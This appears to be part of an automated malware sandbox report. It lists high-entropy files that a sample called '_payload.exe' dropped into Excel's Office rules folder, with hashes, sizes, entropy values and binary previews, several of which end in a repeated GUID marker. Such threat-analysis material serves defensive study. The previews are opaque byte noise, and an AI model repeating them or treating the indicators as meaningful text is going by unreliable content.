                                                                                                      SSDEEP:12:jqKt6tFNz9d4mhsNk0AuRU9ZJUvYtHvgDqLgjo8drNQaThT7yzpZml98q/eVNjPz:bCFZ9GmhspAu2RUvYtHviHjo8nQaThi/
                                                                                                      MD5:0EC3215B6021F942DCDA1D8540FE94C9
                                                                                                      SHA1:18855C81E0F7EDB05B426FFC903A2ED61812F024
                                                                                                      SHA-256:8AEC469ABD7586380828D81698B209E0F523BE43F12C63B4FE99F0C639D65DC2
                                                                                                      SHA-512:EC8BD92A677B72EB1F164DC86002349544457EF5758E531109C7849CF4098EE2FF2EB6B46DB9F523D245481D24A0B9F5EA559A9582D1C2AEDA54F5FEBDB8619B
                                                                                                      Malicious:false
                                                                                                      Preview:<?xml..Z.H6@u._L!..-.F..U.....'....-..!.R|.E].r.g*......q.N[+lv.....eoP.n2.Z3Q..8..\^.M.%.YS.t=9...j....<.p.gxdN.g<.%<.c .e..=..I.....!..x.W0.9......5|..E...p.....).4\>p..v...(.....C..}c1/......f4W.2../l..24b......Z.UH...d....i_Bl.x.kRqY.....Q.!..5N.....~.5HLnU.......hssv...."_.....0M.@.......Gr..<.a...../...i.#..V...}...hY;.c..V...:{!.a.$x.T.uz.n9......5...ee..s.54...T.._....v>A,."e%....S.M.z.JM.4...;.m.U.s.=.\`..a%..Py..3T..5$.zM..!n.......P..^....^.(o.g..*P.i.......@u....EW.J|.q......y.^.r]7k..<...Z.0htj...........u_..\1M.tm..|.)p.f....M...i5.g.....:Q.ZC6.....R.t]D~.H.......W.-T{ ..h|......Xoup.{Z....C}..*..g..Q.:|.V7hZRMDGn2o1XdryxaQbOJI60EuHBvAbPnWEccdDt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule100202v0.xml

                                                                                                      Download File
                                                                                                      Process:C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe
                                                                                                      File Type:data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):929
                                                                                                      Entropy (8bit):7.784328267213119
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:24:OLWpaSV7gOxy9IiDkTzLRZcKVjZGi/+Uk4u00UCf3nv6bD:OLWPp3cDkfLLr+w0fwD
                                                                                                      MD5:633154718A94B81BE1B142969EAAC67F
                                                                                                      SHA1:23377B93C795E3A4CA767264F37434C502A03FC9
                                                                                                      SHA-256:BB5A2404568329AC8A06A9C140796ED650A6E92E70264F00535274F167DB4014
                                                                                                      SHA-512:A928384A7EDBE81172972153D2CFCE318C5BD4438B4B0852F087B1BD27D0CEEFE170BF04CCAA346EE58F1F9E8AB07C4D5A8FB36048F4133D75675181D204FE33
                                                                                                      Malicious:false
                                                                                                      Preview:<?xml.....]D....b.......]......X....8....X...Y4.w*h..Q....06T...,....v..\dpNM.\.S..<[3/4.<.?........){.gL>.m..N%.b&`(..._......+i..3..d...Of......Z........5.........g<.N..... .T...0J_.1@g..._N.D..g.j..G]...<.m....l.........;...P`..v.6J...... ..z.uC...u....\S.p..q..g...a=....C4...s......gn.8......J...<T.zLOj>.<.2.=..F......NkO.O.6r...:V....-.y.a.....i...*.j..t#0.....aAH.>..#.'..-....y.{..a..%A..Q.3qF.xS.4....p.....U7.?U..&...=IL.{3......}..j..8..@.9j'....Ek.c.e!.4....Y.oZ.....-. Ug......PR.Z[..]cq.<Z<.Yz.&...atx.P......+.Ao........-.$f..3..o#..!.... .P:G.cn.a.%..8.`#<..l...........bj..U..nN.'.V.S.\....."90.o4.Ah...........-..._].Z.=x...a.E..KI.T.........+e{....'@.h.j.L...3=.^....D...{0..M.....Y..A6....g.l....k..v..tJhEb..i.6..I M...J<7T.U..u.#s.p!.../.W...n.i7./>.(nW...Q....~%T..*,a.,.1q^......F.....hZRMDGn2o1XdryxaQbOJI60EuHBvAbPnWEccdDt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule10450v3.xml

                                                                                                      Download File
                                                                                                      Process:C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe
                                                                                                      File Type:data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):1387
                                                                                                      Entropy (8bit):7.843737799464288
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:24:0RHEnQ3gcY0GD1W9k0jsIUE1SHB4UiVVY2lJBvc9CG2Gy+rqLOzjgOCdC77fjIMf:kksvk1wkI64UiVVBpv2HaSzEazkM8TLs
                                                                                                      MD5:CA214ABBAB8747F70F52277651D59981
                                                                                                      SHA1:F9963D25CEC2A7AC384A5B7C43CF03261538F8B2
                                                                                                      SHA-256:231DAABA427D736E80B955017C50AE97B24CA459C14468278BC1EBA09C8F63CF
                                                                                                      SHA-512:437E91AD87E70134F028C571794A38E4F8531E3632ACEB7596325E40B9D789CDFEE9A59AA83E6AAE8EA19BF3E0B05FBB51B9B02BD18C48FB4C2CD0A66C72F5C5
                                                                                                      Malicious:false
                                                                                                      Preview:<?xml...UW...8b.oQ..$2.|..d.v./.cn.~u....l..CDz....`.0.....<jx...o>0Bg.e.*....-,=5.=..y..wj.a.M.w.....O..[...!v..VMS../J...B..z'..e.e1.W..lk6s[..4.`...'...G..LNl.M....N....2.x..A.6q...1*p.yM../...1........[.....V......>V{.]9.c.U....m&..]`^..a:.^..5....I....7.......!=z2..1..!.^..m9<0.{o....n..D.....G&N$..1..$9I....M...8..Lq7i..g.za-B.."FFE......^.16.Ye.~.....q)|.I.U.I..F.K:....7.B....fWAh@.......k..`M$ *..=3.!%.....G\)*..C.B.y.7...h...b...........c".z7..#7..[D.3n.to.@)3.&.35.....Q...c4....{.b......j%......s]..J..6..>{..;Rj.I..e5....q.]..[.DZ]..GV./6.D.q.l......^.uT.c...=6.^..x6..Y.M.T..S.i=x.~.a.I.....m..qq........8.......|...~...<...im.}...D.[..p.3L.@$.'.R.rr.9ym...s.*....`L.zUQ..|wU.e.R...p3....+..@y.cCN>.DS.i.e.8....`grc.....O....?...>...E.2*.||.y.yV......$.**....8.h.%.6..[1^.-g....rS.3...o-.}n....jO.6E......2...v.k.&L.>..`.._F.]./u..A..5}......M7..b....<.g0. .p.j....a'.L...@..c=.$.Z.!.E.THW..h.a.h.{.B....B.(..ho.I.g~.IO:.6..N_...|

                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule10625v0.xml

                                                                                                      Download File
                                                                                                      Process:C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe
                                                                                                      File Type:data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):3024
                                                                                                      Entropy (8bit):7.931456128895427
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:48:0RAcRKYcYQgjAo4iIJ+Dpd5XXBRJgqwrOlzrIMsncCvRuYhoB6UX/e/DkiCoxDhN:0RAUKYDQgjAo7xBRJ/wrOVEGuRuHIDmK
                                                                                                      MD5:E932F34078471AFF61C4B8F5622BF416
                                                                                                      SHA1:E2A17C3C79B103DCEF1DD34832ACC49432BA7507
                                                                                                      SHA-256:AA0FB90CEE45B9CE93DEFC5DDCB1CAAF38DE1ACA596267A30E25296A9590E44C
                                                                                                      SHA-512:D8C6AE062040B8B3790C1600447FF0D9F424920D87B12F97C7F9E76B63947A4D359BFFCA96D9C9B1D112BD129FA5AA9DA1F2D5838F14B2E9E8A6527A6E54C02B
                                                                                                      Malicious:false
                                                                                                      Preview:<?xml...xt.p...s.SMq.Z.g...z.n.$FHk..{'.J-.F.W.a.."3...L.;.ReT.Yc.~....<..?.$.....s.[.d.F..../...b..}/}..H../......@....y.....w.^.=<..:..g.3.8...D.....RMJ6<...HC.... N6....i....i..|.Q..o.$..".\_.pA...._M.!_......C./..*G...c.......*.5.W.Ir4XP.(.X..i....b.j..."!.)xM.-m...2j.....&.<....s.yr\e..s}K....zNk.{.:.........%k.....w.G_.LD....=..De.8........*J%...3'^..#.....x.x..ED>...f.2&-j.A...1...B..).....@1..m..B..|.,f8.x>Ig1.l.S....x?W.^."R.'.t..#..Uy8..2;$.e/..%.~..P...ul.[.@7.......V....n.x.-.-:.R...qF.;......dV.....7.#...!..@..7.VU.X4r....Y.`q.U.|R..'....'n$.0...B.W.s,;9.L..g...`..x>..Y.....].....dM.|...~y.....'=..m.`.......^R...81..4.Tt.R..5rY+...VE..T.A-3....oH.X.MOl.-.5.iOe..N+..Bx.z..]..k.&..h....+.T2...M.wY.[....;6.v...M.PC}._ ...?j.$...4X..G...2....e.8(.Zq.;....{.`........(].....V.f..].T...a[C[....c.v.I..2.....e..tP....E..i...U..sj..z#.'...."..Y6....l....*.=w...G{......f...?..V....Z=H;.M4.BO.38......?Q..K0....\...\}.3.1.^........I..}.Z...2<

                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule10626v1.xml

                                                                                                      Download File
                                                                                                      Process:C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe
                                                                                                      File Type:data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):1675
                                                                                                      Entropy (8bit):7.888558927817909
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:48:AV/qz3K3dCcGHbX8T/9XWVrVeXKAzY20NnLnowD:dzydBIbXU9XUxeXtzL0Lx
                                                                                                      MD5:38B1579B02600A09C1D53BE0C13AF966
                                                                                                      SHA1:BA6D9214283CDEACC9206B7DD3A9F8D38CDBC109
                                                                                                      SHA-256:83C0717A3270722141663E4508DB48A309A878E64CC30DC04BC11FDA8F2F9534
                                                                                                      SHA-512:10D383FDCC9B2305BEB541406DFE46B8B7370EFF2B30E1629B591D293D4C74EF876BD4D91864E4E140F96BEEB01A5D6E2A105094D65994246EF526BF4555B050
                                                                                                      Malicious:false
                                                                                                      Preview:<?xml...,..z..%x.....Z...)S......O...NN..*.,.s......T.:.T.J^T..J1....".....I..o1||.?..W..)4G.jp......J. 3.C.n...*..@.;.~.2..].A.eq..;.<..|.N..9e...;{......y.3M.}.>.S6...1..)0l.\.nj.Or........F.J.$\......E....12'...Z.y.|7z8NZ.U.&r./.....n...f..b....fJ[..]......J.?.....n.....g.`.....Wqa.2)$&wZy.98F..fq...ic.;f..cEC...E.c.u{(....`.VA..v.....J...rR$&X.....2...z.m.T...Q.e...'.MjQ...#O...E1....&O9..S8....m....A.q`..D..N0.F...l..V..sYi..H....r.o&.]=-...."._9...y~].P..;.|..A..eU...{?..n.W...V_..I.2L-...b..l.......E....5b~o'0.)..>..A#.?!S+.U...Bwk.X].^8...v........gH.y.....(...m...L...E..10....#..THGf.....n..U....v7.........sW.....4.k....Eu.|.P..c2....p.q.vd|d..u...6~.@..JB...3F......q.<.`....wJ../..=....+=..e....~/.=q.....[...A%..R.P?|F......q.s=...44.,.2...r.x.(d)...Sv..;.5c3......(..hB4..._Xy,..... u V..HL.(..IW.t..........iV....Ym.qN.B.X.:K.....@..o...v.8...#."e5]...t.D......mf5xX......e'.q..J9L..........p!..;{.~.x..L......,.....+.|y.

                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule10627v1.xml

                                                                                                      Download File
                                                                                                      Process:C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe
                                                                                                      File Type:data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):2113
                                                                                                      Entropy (8bit):7.90589352782227
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:48:1UvZpdDwFIG2BCvGZ8vICTq+ZcFn/9KpbFJntddVksgs5Rca1h7EMYnwD:1iMOXgx3TrZ2nIfnEq1BzR
                                                                                                      MD5:8D384432FB966BE9F3C6F0E6CC3887AA
                                                                                                      SHA1:450232AD002CBE07377254E813E9859E725CDAAE
                                                                                                      SHA-256:D8ADDC2F55486FB315AB78DEE7A72B9E9212DE0307CB8A28BA8D22D6E8C5D384
                                                                                                      SHA-512:F0C6EC06371F71C52874B498F2FFCB005C63B313893B2A706A45BCC1ABB342E2742CB854477E08FE304F0DA31CE8077E50D7B5B9A17659624D9AABD6318E1294
                                                                                                      Malicious:false
                                                                                                      Preview:<?xml.....v...U|.Km2Q/b_............EG.rJ.<.h.La.qD..........S...j..Z8Uo..y}uK..#!...G|.b.V!]I..."|JI.$.W.....}.o.16r..x.G....Q..nS./G.....o(.4.o.J..s..........=.J..j.....Z.9..O.q.mWK$Y.w%omx.....k..x...Z.%.2.....h..J....:`'...........|...l..h.N..:.]...z.w&.2.b ?.z..K..p\.u..H...j..2$6T......o.Wl:.H....D~.....M%=.r.y..7...p....n....|x../..U.s.....=(l..O.-:.,:.et........0.....:.7.u.!..e.YU...'..4...!.....WYX.....S........T/v.%w.....q8.}.m..._.q8s..X>.i{......({...7!u..g6.=.;O(c...[:.b@..s|...m.H.=.L~a.|....mZ.&_...e.f.<$.T8."{.4%..~..j......H.q.n.R......%.!..2Y.S..q...q.;........./....G]+.z.]......U+....7D..43M.P.1.L._5..$.....o...^6.....p.~....%..r...e....-F...dH.`@?.q..r..C.RgL{.V..@|9.|.O..2.^1..!....p.pP!....e..:-'.NT..)%...>S*..2...:{..d..8Zx.|L.....1.B..Sa.V.XYw..U....=........m.N.-.)59..^$R....sL......@..?....B..!L.^4...+.1.yM...E8.+S.1..Q:V.f".B0....N$5..J,me..).h.WS..8....Wq{.3..L.w#..M'[.UwdW....%..nX.hu.<TX.,O.".-_R.....V

                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule10781v1.xml

                                                                                                      Download File
                                                                                                      Process:C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe
                                                                                                      File Type:data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):813
                                                                                                      Entropy (8bit):7.735711057216108
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:12:Izh2wqe7n06BBB4p5oylq2ou7yPivWiGhHFFwkrOYoSWFnSlTA/3F9leNzv6ciik:ShfqOBK5llqtu7KSKy4Ozvdv9yv6bD
                                                                                                      MD5:10A87DE0ADF9A16B3EBBB5C0BEEFABEB
                                                                                                      SHA1:285C735CD84B11841D0536968710C0219F7CF56A
                                                                                                      SHA-256:757AACCDB2FE77F8F18BE54683EAD93E24E76307E43ECCBC547111B5CE998BC0
                                                                                                      SHA-512:0AF7AE75330E94B348FE2C49F16980F09647F1884D17EB5AB34935DA9ED0F4836B768E2F289A60CC5EFC2EE59A42F7BDEC2E98F100103ED9E4C68A4271A00985
                                                                                                      Malicious:false
                                                                                                      Preview:<?xml.02........%.!.G.j..!.n.v.V.hG7..3kO......k/.....sN.h........X...Z..WQ.../..Y,....X..@.L.|........;.[..x..Y.i...Y.u5.i. .w.S.z......Z..r|.+....>..AcG...#].C...w...&.4.'.....3I...z./+..Q.d2..mx.........yt..TT./.^.t...'..2....^,.N~.[57.V.2..A.,...H...3.8..T~.:A...@......H.1....2...I.../....M.........+..... ....}.k[.E ...-e..j............f{./.j..`..e.0t...Q.z..;.w....Z.|.......4..v6aR..j......2*V.+P..Hc.....d.sD}.....Z.h....~..!..-z.Q..'X.oh.7E..i. R&.........".<P......Y.Z...G../fvp`.W.$..@......s.......!.....Vi..%.vb....-ohA%..-G.i.3O.5W...p.Y...r#N..MG..H.......qS7.-....{.eu=.d3..D.pY.........Q[.]...*..K..A...LA......\..C.z.LR..cR6.....;Ms.....YY.e.#P.kv.H.Nl6@7..m..{.y8(Z.B|D.4..~P>.hZRMDGn2o1XdryxaQbOJI60EuHBvAbPnWEccdDt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule10784v0.xml

                                                                                                      Download File
                                                                                                      Process:C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe
                                                                                                      File Type:data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):2070
                                                                                                      Entropy (8bit):7.899197852345993
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:48:37ACsw7rLPooDlSL2uAoEtV3DXl3G2f6Pff0gHZfjbYFBwD:37A+fHBi2DbtdTljyHhHZfgFi
                                                                                                      MD5:CAA4F7D1152B4B69630EF38FD6996E22
                                                                                                      SHA1:DC9BE58929D8E42F75690D262770580A0F6D33AA
                                                                                                      SHA-256:E4300A7BD4E3B470EF071F63F4B8BC1ABD317D63055D843952E9F31D77B568E6
                                                                                                      SHA-512:D8DC6E559EAB66EB20659A8FCCBB8B59B9C6D44146F14CCA1926B55B2813C84A08F439DB2EF973B307196B5A86EABB9621B164A3F667EC045A5B9828FFD55428
                                                                                                      Malicious:false
                                                                                                      Preview:<?xml.....x.=M.&..R..VL7....T....Lu..^{s.Zo.. {.x......r.b.5.:....J.F.....C......]N....@.\m8...J.c.B.S....j\.Mu.b.[..o=........G..d...S.&..].9..l.k+.Px......1..U...O..8.....o.Fy..V.{t..E...q.8."{ J$n..l....&.pFa..A.e.F{.....E!*g.Q.V8w9(......i.i...k.....w..e.[Ec..9r..D.xd'.;.5...B.`q5.~g..t..}K|.R@*}...~o.@.6..Z....hbLM.1..e.+.qy...w....._.(..l.z.N=.@.#...|...rm.......n..=zPB.]*........@+p,Y{...>.bQ&.Q.,,e...G>....e.!r..n.R...^..a.:...Kx...&...j|.|%/.7T...N.8.;..bB.x.....a.......D..........\A.Y.-.r..N....F."i.........#a.fW....V|....m......h..>..@(..bX..q.*X8Ead$.._...(....U;.>...*^.3D..S1..T =z....'...$.N ......e9..9.....ha....-E.@.'2..>....R.Z.h..5..A..]..`......G......%.....~.m.[...9l(.0.....h.j...Tt3.UXL...e.o>u).......jk.P,...Y.).r.,P.V..oq%...B4._........a82D>.|..O....:fy.Z.+...s.M|...;J'r.y.Z.EX.....%......e..7G.Y..E!(.E ..l.f.gd..NEN.A.E..3l..X...E..R.7SiC.h.'......]..........=.......I..oo..TT.<.1.q5.i.,..K.xa ..%.^.D.>W....P..

                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule10800v0.xml

                                                                                                      Download File
                                                                                                      Process:C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe
                                                                                                      File Type:data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):789
                                                                                                      Entropy (8bit):7.6917720589926475
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:12:wIyAUKDGx8uaya8S03TRGhpnxGl9eepxDkpGbQjuMV1mYmv6cii9a:wIa8uayaMTRipn0Pee3gp8MV1Dmv6bD
                                                                                                      MD5:F7088D7D150BAD48716CE71C496E31E2
                                                                                                      SHA1:B3769EC6B332A8D4D01F5AA3082398507F874FC2
                                                                                                      SHA-256:2483D5D7E7519B0ACAFB60E489F0D32FAFB7B682FBD6769A9F0AFA4F478A09E6
                                                                                                      SHA-512:70B85C2B84E27116EAC7B47E9E5DA7777C49891918EA8C43537A4C22869A67CF4AD60FB32F3B2CEA769628839146C0D456F7FCD889372B6DE408D060FD81580F
                                                                                                      Malicious:false
                                                                                                      Preview:<?xml..e.~....I....._...Q...1b.t."6x.....Y...@z....1Y...:F..7...[d...1).7..N[...w.,..F./.]t....vp...d..HE...7..cIBC./..,.....9.d..V}..9G...z..X..T....p...S...:.1Uk`'B.D...4.]...wX^.:i.0.....K..g..rf..........P2E...(.6|.j.%K-.=.$../..H9E.C...91=.1$.x..n...RjF...Q..clS.H..{.........b_.E.._/>;.".{.Yc.*...KsV.N..}a.Ku.....x..J.K...-.!.......Z.c.:`....2..e..........{.r../f.....e...y...l...8%`.A....F.6.1.e+!NV!7....a.1.S..K...P../L../X,@./T.{O).......q..f+2.b@;...r.y.#..3b.bB..mG...g...r.B.2....x..K.1(.R....H........y...@......{Uh..R..Ia.....g."...........r(2.p..3.q]I...n...9vW.GA.....PSu+l:.u....j...u..N...[..L.p.Y.-..^...1:.....=..*.?D.e.#...'CB...n.P.....2w|.g....hZRMDGn2o1XdryxaQbOJI60EuHBvAbPnWEccdDt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule10801v0.xml

                                                                                                      Download File
                                                                                                      Process:C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe
                                                                                                      File Type:data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):3017
                                                                                                      Entropy (8bit):7.931948151475423
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:48:xOLIMsXPD+2QHiPvn6e8RexSpRKG3q66nOny42M/9iAA9fjseI/VR1ASPgXwD:xqT15iP9eeUpR5y4209zm7sLR1Aagc
                                                                                                      MD5:471461579F00D689FC50AA8B02A4B722
                                                                                                      SHA1:47BE50AD996B82AE86CDB76196E2DFB9809B0339
                                                                                                      SHA-256:84C36F1BB71E88604281920519B9AC73BBEDF3E17FF5143B5B7B92B1BB7FE48A
                                                                                                      SHA-512:39D1B4B71E6172E34FBA992574FAAB6D09368DF2984E3AF7B86E9909BCEA4FA7EFBA7F402E1D3973FBDC99A71580D7A8A12DEF5407337BAABB6000AACD77F8E7
                                                                                                      Malicious:false
                                                                                                      Preview:<?xml.....:..2......c....q...z....6[g...../"....[.,|<.(...x.#..0..L..}_..v....,8.......p..zf..._../...*G..L.o.' C]G.$j.z...0..J..M. G9..y.........T.%G?.}..$........x+.....t~a.....$.m.7UU q}.|...}..>3pZ.:.[_.....0.}p..]...ga..&...-p3.......}.~.o..1..VE.J..khEyq_.C...vh8..s...NI.nAx....G.C!........#.r)}....h.._..P..0.1.h=..Vw..1.EA.&C...{._h........K.*.....u..e|..L.8.q.H.....J.-.n......n.."S.}+. ..o.[..qL.:.WKC.*TN.p..HG..D@a.E..D9te.V.Vc..!h..M.><m.P...D<....B...C.w........[....S.....H5h.i~...'....L....{.a!.*.e.7....N.O".{....H.R..-.@...U.S-)h.d.5ey../q.n....$.O..i3.."/.ZF&3....l...g.....;..}.A.W.f....3...+...!X.a...o..7........?p..N.u\]....&.zi...b_.j+1.).L.).....*#6@#..>.=.pS.......J.>...pf?.4iSua? EQ:?.[.4h.[.f.7z....NeU.A0..o..8..)N.>.t.8.=b.T.S.\./~.8@..6.vu.;...<0'tN...ms....2...\$h.l....:b.....B.A..d..u?. d.....W...^..|:..Zm.....x...o.F...;.f.z(...7NV .u^99.>r...k.>.CY..aF..g.n....1-j..U.H.5=V*.._l..>.....rN)..3.....S.(../.....+.R

                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule10802v0.xml

                                                                                                      Download File
                                                                                                      Process:C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe
                                                                                                      File Type:data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):3017
                                                                                                      Entropy (8bit):7.938197740082705
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:48:aoAp7IYf/fSZimvrRG8wp4hJgsAzRmDaZVL+7AkdccZitFBXmF2V14BN3UGLeLwD:0BIuS8mv9MacLSaZVL+7pdhZivQF2V1m
                                                                                                      MD5:6F15526188284BDE308D954E06613870
                                                                                                      SHA1:A26EB389C2167ED0BCDAFD4E90DA07735272366F
                                                                                                      SHA-256:73E901F4CF2072D19A5C52CEB1E483199948B8B533BD1CD581D9C816080A0A37
                                                                                                      SHA-512:03879CBDEFF533BF6A97B9C11CF4E229634441A4AC6EDFFE3E9563CD64A82728757401D86B1318B3D58FF60663FC6C83C694889CF8018B6512CAA524A817552A
                                                                                                      Malicious:false
                                                                                                      Preview:<?xmlY.b..A...{v/}X..P....4..EW&....%..[....O...!..Y.@M...#..........nb.}^.O.z..#..N....m...2)..y.4..../..mDK<..5P....i.`.{..]Yk.5D..P.=Kg%._w}."7.2........B.*.k.V..c..BmeG ...x...qd69.....y.dN.Y..k..O.p...N*j.%.!..x.........M..p)..;.C..\....s;....n%..F.5..!..n0eLg.P#......-.o.$23...s......H..j...hN..g...].b...A...".P<'..>.Z.....P8....0.^...j.H..'.SB).u6..>.0..f...../Y...Z.jG..4&b.e..;...s?..q:.'..`u.G...x.%..EK.9u..\..aeQ.:...,z.xp.4..N......'e..........|...g...h..o...O.C.#...o.....%A9l;.....3...8.+...mOB.y&...._.]/?._.zm......>=..Sv.......f.k.Uw@.....E.....-.H..f.]....Mx..Z.O....{..q.V"d..Vr-.oY-....!C.&.TJ.<.G...>....`...pK.K.@E@.....+.......`.;5.il.b..)..:f..^.@..y..N.....u}6.X.i.....4.L!.m. ...\@^%f..e......T.7&....1Z$.H......,.V...H.4.........T..C4@..FY...P.'.g./M.t....+.p......M.}.O}aT%)e.)..P$.!8^F..s...7/........E.>...?...5......rz..L.vBJH.+Y.su..9..S.....*W..%.....7.9W...3p.....;z\3.....~...t.}$c..\.|......<.f.*..{...2Q.

                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule10803v1.xml

                                                                                                      Download File
                                                                                                      Process:C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe
                                                                                                      File Type:data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):4639
                                                                                                      Entropy (8bit):7.9574905441416135
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:96:gjDqDEEvQE2BAiUC9OZpIveSJXzK0Wq8siBP30NlCHGBS:g2h2BvxXzKzq8xkNzBS
                                                                                                      MD5:509B7A96EFFDBA01468BFF5E58CF7B05
                                                                                                      SHA1:28FFE40BDB274007A04EBDFFC5FAFF07EB28D7A3
                                                                                                      SHA-256:6895D366A8C47EE2B12204FA78D7DAF8A696D64946B76F8A3724305BEEA79445
                                                                                                      SHA-512:75C12B185523512C5211A07E607F8DCA3797659BCFA2600FED36E08922414F584E287EE4A8AA3D6752EFD23ED4F67748DEE4B7B6902754C481DCA9679BA5BAC6
                                                                                                      Malicious:false
                                                                                                      Preview:<?xmly.B.&R..yY..^......8.....9......U..y...I..~4b\.....7...x.V~;.]../:.;..<..i.....x.....oq.I..............z........q.....LE.a.:..c..!.3...m~U.1...@-j...@Lc.vR..|.....f...d.CC3c.q..Q.FTD....u..@P.NQM..j.s.9xP.....g..'...<F..._q..8.p....gq...j<>19.pF.C....[...'..@.N.K.........s.}+..G.p%.5N..#h.R..?....y.}:.^'.PR+.$^.r...b)}...^.5.]...n.S.W.x:..-g...@.:.|.Lq..a......q..=........e....KXV...&@... .(.[.GHt.j.).V..'|.v...W..;..q.U.J,.I. /(..8!.........A....H..!]....>z....|Ag+....L:..e...ZF..6)..x...b.......>...$'n.8..}.......=..dG.........@-.J.../......n}..iN.H:..fA.c,..y......l!.1..s=*3..Jg^.{..>I..J......S....jIEh/....'.i.......=-.B..\.n.P ..ge...{@.....R...O..K..4.B.'....\..d.(......2`=>..r.....TM.{..b=m.x...,......'E.^......@..A.......n.'.....[6.G.......b....Ul..p...bp.....7.....Z.I.G6...atJ...E[......8..1...b...Ke..&..}F...n........7.'...zQ.....G.'P..g.^.9..!K_.D.f...C.0g......si..:.f.B.....|n.)._OZ..b.E..]....

                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule10807v0.xml

                                                                                                      Download File
                                                                                                      Process:C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe
                                                                                                      File Type:data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):1329
                                                                                                      Entropy (8bit):7.844707178693624
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:24:Wn6D+X3WejDVjODnziDQGYEG23zXjgcKo+3lIDA7RLpmNhmFR9Yi3X7zetXvZcYW:WcW9OniDllzsx3l8UomVr7qtXBcY1wD
                                                                                                      MD5:140F43A16306308050ED1A1088BFAF68
                                                                                                      SHA1:065E0116BCC7CEE851051A1CEC3F05CBFD3232CC
                                                                                                      SHA-256:A71B7B1C0118607F4A0925D637B2E4A9500E30D175060128AE74C8E42ADC9743
                                                                                                      SHA-512:89F508680A150BA05B8C0BF2E50E30EACC9E7B5C15ADB5B5ADF56A5B0CB60C7975552556E21737EA40C75520DDA129E2978E50A0565148069C5EFED6770C1450
                                                                                                      Malicious:false
